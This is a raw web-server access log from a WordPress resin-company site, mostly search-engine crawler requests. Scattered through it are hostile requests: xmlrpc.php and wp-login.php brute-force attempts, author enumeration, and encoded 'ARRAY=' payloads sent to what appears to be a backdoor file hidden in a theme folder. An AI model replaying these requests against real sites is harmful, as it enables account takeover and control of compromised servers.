66.249.75.2 - - [07/Feb/2024:10:56:50 +0530] "GET /item/s1517634869.shtml HTTP/1.1" 200 135500 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:10:58:47 +0530] "GET /item/s15210205882.shtml HTTP/1.1" 200 129296 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:10:59:05 +0530] "GET /item/s1517885377.shtml HTTP/1.1" 200 142068 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:01:04 +0530] "GET /item/s15210207158.shtml HTTP/1.1" 200 138388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:03:16 +0530] "GET /item/s15210203060.shtml HTTP/1.1" 200 137834 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:05:31 +0530] "GET /item/s1518369972.shtml HTTP/1.1" 200 139137 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:07:02 +0530] "GET /item/s15210718413.shtml HTTP/1.1" 200 142171 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
147.78.47.38 - - [07/Feb/2024:11:07:20 +0530] "GET /?ARRAY=5o313730373238373833392p22687474703n5p2s5p2s626166386o372r776s6469726563742r746s705p2s3s6p633q78696164616r5s72616r645s7061746826743q313730373238343233392q6437336130306361643739353335646163643234653862303432656335626334222p223263336365313135393530333337623362383032313563356265333739303434222p223236313736316262613936313838633038333939626534333630613935386237225q HTTP/1.1" 200 601 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/103.0"
66.249.75.2 - - [07/Feb/2024:11:07:46 +0530] "GET /item/s1501771417.shtml HTTP/1.1" 200 136416 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:08:05 +0530] "GET /item/s1504683004.shtml HTTP/1.1" 200 129981 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.215.222.65 - - [07/Feb/2024:11:08:22 +0530] "POST /wp-cron.php?doing_wp_cron=1707284302.5045020580291748046875 HTTP/1.1" 200 - "-" "WordPress/6.3.3; https://www.skresins.com"
45.40.166.113 - - [07/Feb/2024:11:08:21 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
161.97.150.136 - - [07/Feb/2024:11:08:22 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"
141.98.115.49 - - [07/Feb/2024:11:08:24 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0"
161.97.150.136 - - [07/Feb/2024:11:08:31 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
198.71.229.49 - - [07/Feb/2024:11:08:37 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Linux; Android 10; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36"
34.142.214.245 - - [07/Feb/2024:11:08:37 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36"
92.204.220.169 - - [07/Feb/2024:11:08:39 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"
45.40.166.113 - - [07/Feb/2024:11:08:50 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
37.97.201.80 - - [07/Feb/2024:11:08:55 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14"
45.40.166.113 - - [07/Feb/2024:11:08:56 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
132.148.105.38 - - [07/Feb/2024:11:08:56 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1"
198.71.229.49 - - [07/Feb/2024:11:09:13 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0"
66.249.75.1 - - [07/Feb/2024:11:10:01 +0530] "GET /item/s1506996599.shtml HTTP/1.1" 200 140351 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:10:20 +0530] "GET /item/s1504685528.shtml HTTP/1.1" 200 136222 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:12:19 +0530] "GET /item/s150613150.shtml HTTP/1.1" 200 137043 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:12:35 +0530] "GET /item/s1517639194.shtml HTTP/1.1" 200 137146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:13:47 +0530] "GET /item/s15210711050.shtml HTTP/1.1" 200 130307 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:13:48 +0530] "GET /item/s15210711050.shtml HTTP/1.1" 200 130307 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:14:31 +0530] "GET /item/s1506997358.shtml HTTP/1.1" 200 136353 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.37 - - [07/Feb/2024:11:15:06 +0530] "GET /item/s1504753738.shtm HTTP/1.1" 200 127714 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:15:18 +0530] "GET /item/s15210719363.shtml HTTP/1.1" 200 133250 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:16:46 +0530] "GET /item/s1506991353.shtml HTTP/1.1" 200 130964 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
147.78.47.38 - - [07/Feb/2024:11:07:18 +0530] "GET /wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/file/index.php?ARRAY=5o313730373238373833372p22687474703n5p2s5p2s626166386o372r776s6469726563742r746s705p2s3s6p633q7068705s636s64655s6n6326743q313730373238343233372q6338373862326463636566336236643564346463663366336439373830663061222p223463396232653232303633383239636663633034346464346566343535336361222p223066316239643631313364633062616262353764633131636633333431623962225q HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/101.0"
66.249.75.2 - - [07/Feb/2024:11:19:05 +0530] "GET /item/s1501779257.shtml HTTP/1.1" 200 129283 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.126.68.3 - - [07/Feb/2024:11:19:45 +0530] "GET / HTTP/1.1" 200 47070 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
5.188.62.140 - - [07/Feb/2024:11:19:55 +0530] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 5871 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
5.188.62.140 - - [07/Feb/2024:11:19:57 +0530] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 5871 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
5.188.62.140 - - [07/Feb/2024:11:20:02 +0530] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 5871 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36"
5.188.62.140 - - [07/Feb/2024:11:20:03 +0530] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 5871 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
66.249.75.2 - - [07/Feb/2024:11:21:23 +0530] "GET /item/s1506992045.shtml HTTP/1.1" 200 138595 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:23:42 +0530] "GET /item/s1518360380.shtml HTTP/1.1" 200 134278 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:26:00 +0530] "GET /item/s1506995399.shtml HTTP/1.1" 200 137676 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:28:19 +0530] "GET /item/s1518363797.shtml HTTP/1.1" 200 143290 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:30:39 +0530] "GET /item/s1501775124.shtml HTTP/1.1" 200 129021 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:32:56 +0530] "GET /item/s1518361786.shtml HTTP/1.1" 200 133010 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:35:14 +0530] "GET /item/s150610351.shtml HTTP/1.1" 200 134567 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:37:33 +0530] "GET /item/s1501778823.shtml HTTP/1.1" 200 130576 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:39:51 +0530] "GET /item/s150619726.shtml HTTP/1.1" 200 129482 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:42:09 +0530] "GET /item/s1506992105.shtml HTTP/1.1" 200 141085 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.45.154.65 - - [07/Feb/2024:11:43:27 +0530] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.65 - - [07/Feb/2024:11:43:32 +0530] "GET / HTTP/1.1" 200 47070 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.65 - - [07/Feb/2024:11:43:35 +0530] "GET /wp-content/themes/sk/images/favico.png HTTP/1.1" 200 5536 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.65 - - [07/Feb/2024:11:43:36 +0530] "GET /favicon.ico HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.65 - - [07/Feb/2024:11:43:37 +0530] "GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1" 200 4119 "https://www.skresins.com/favicon.ico" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
66.249.75.3 - - [07/Feb/2024:11:44:28 +0530] "GET /item/s1505152114.shtml HTTP/1.1" 200 131463 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:46:46 +0530] "GET /item/s1505157925.shtml HTTP/1.1" 200 136664 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:49:05 +0530] "GET /item/s1505155857.shtml HTTP/1.1" 200 139554 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:51:25 +0530] "GET /item/s1505154617.shtml HTTP/1.1" 200 131735 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:11:53:42 +0530] "GET /item/s1505154304.shtml HTTP/1.1" 200 132064 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
107.189.11.82 - - [07/Feb/2024:11:53:42 +0530] "GET /?author=9 HTTP/1.1" 301 - "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
107.189.11.82 - - [07/Feb/2024:11:54:16 +0530] "GET /?author=9 HTTP/1.1" 404 32715 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
66.249.75.3 - - [07/Feb/2024:11:56:00 +0530] "GET /item/s1505159305.shtml HTTP/1.1" 200 133055 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:11:58:19 +0530] "GET /item/s1505157324.shtml HTTP/1.1" 200 132717 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:11:58:29 +0530] "GET /atlantic-3866.xml HTTP/1.1" 200 146631 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:12:00:37 +0530] "GET /item/s1505159952.shtml HTTP/1.1" 200 132207 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:12:02:16 +0530] "GET /item/s1503175919.shtml HTTP/1.1" 200 127815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:12:02:56 +0530] "GET /item/s1505158933.shtml HTTP/1.1" 200 135731 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:12:10:07 +0530] "GET /item/s1529820773.shtml HTTP/1.1" 200 129943 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.1 - - [07/Feb/2024:12:20:28 +0530] "GET /item/s1506518875.shtml HTTP/1.1" 200 128955 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.215.222.65 - - [07/Feb/2024:12:25:12 +0530] "POST /wp-cron.php?doing_wp_cron=1707288912.2435140609741210937500 HTTP/1.1" 200 - "-" "WordPress/6.3.3; https://www.skresins.com"
35.171.144.152 - - [07/Feb/2024:12:25:11 +0530] "GET / HTTP/1.1" 200 47086 "-" "Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36"
35.171.144.152 - - [07/Feb/2024:12:25:13 +0530] "GET / HTTP/1.1" 200 47032 "-" "Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36"
34.75.77.211 - - [07/Feb/2024:12:28:57 +0530] "GET /robots.txt HTTP/1.0" 200 13714 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
34.75.77.211 - - [07/Feb/2024:12:28:57 +0530] "GET /pigments/ HTTP/1.0" 200 36151 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
66.249.75.1 - - [07/Feb/2024:12:29:08 +0530] "GET /item/s1501728729.shtml HTTP/1.1" 200 141624 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.178.146.199 - - [07/Feb/2024:12:30:52 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
37.97.201.80 - - [07/Feb/2024:12:30:58 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
178.159.242.91 - - [07/Feb/2024:12:30:59 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
37.97.201.80 - - [07/Feb/2024:12:31:02 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0"
185.114.247.92 - - [07/Feb/2024:12:31:08 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1"
2.56.91.17 - - [07/Feb/2024:12:31:10 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14"
167.172.115.176 - - [07/Feb/2024:12:31:13 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
88.119.176.89 - - [07/Feb/2024:12:31:13 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
161.97.150.136 - - [07/Feb/2024:12:31:17 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
198.71.229.49 - - [07/Feb/2024:12:31:17 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0"
209.159.152.104 - - [07/Feb/2024:12:31:18 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
45.40.166.113 - - [07/Feb/2024:12:31:20 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
134.255.217.76 - - [07/Feb/2024:12:31:28 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
66.249.75.3 - - [07/Feb/2024:12:37:33 +0530] "GET /item/s15210716372.shtml HTTP/1.1" 200 143648 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
147.78.47.38 - - [07/Feb/2024:12:43:07 +0530] "GET /index.php/jk HTTP/1.1" 200 43 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1"
66.249.77.36 - - [07/Feb/2024:12:43:09 +0530] "GET /item/s1501047800.shtm HTTP/1.1" 200 129445 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.2 - - [07/Feb/2024:12:44:50 +0530] "GET /item/s1529772637.shtml HTTP/1.1" 200 128688 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.3 - - [07/Feb/2024:12:48:18 +0530] "GET /item/s1505327217.shtml HTTP/1.1" 200 133943 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
47.128.56.21 - - [07/Feb/2024:12:48:50 +0530] "GET /polyester-polyol-process/ HTTP/2.0" 200 33625 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:48:51 +0530] "GET /wp-content/themes/sk/css/font-awesome.css HTTP/2.0" 200 37414 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:48:51 +0530] "GET /wp-content/themes/sk/css/fancybox.css HTTP/2.0" 200 13629 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:48:51 +0530] "GET /wp-content/themes/sk/css/bootstrap.css HTTP/2.0" 200 146010 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.128.56.21 - - [07/Feb/2024:12:48:51 +0530] "GET /wp-content/themes/sk/css/style.css HTTP/2.0" 200 31419 "https://www.skresins.com/polyester-polyol-process/" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
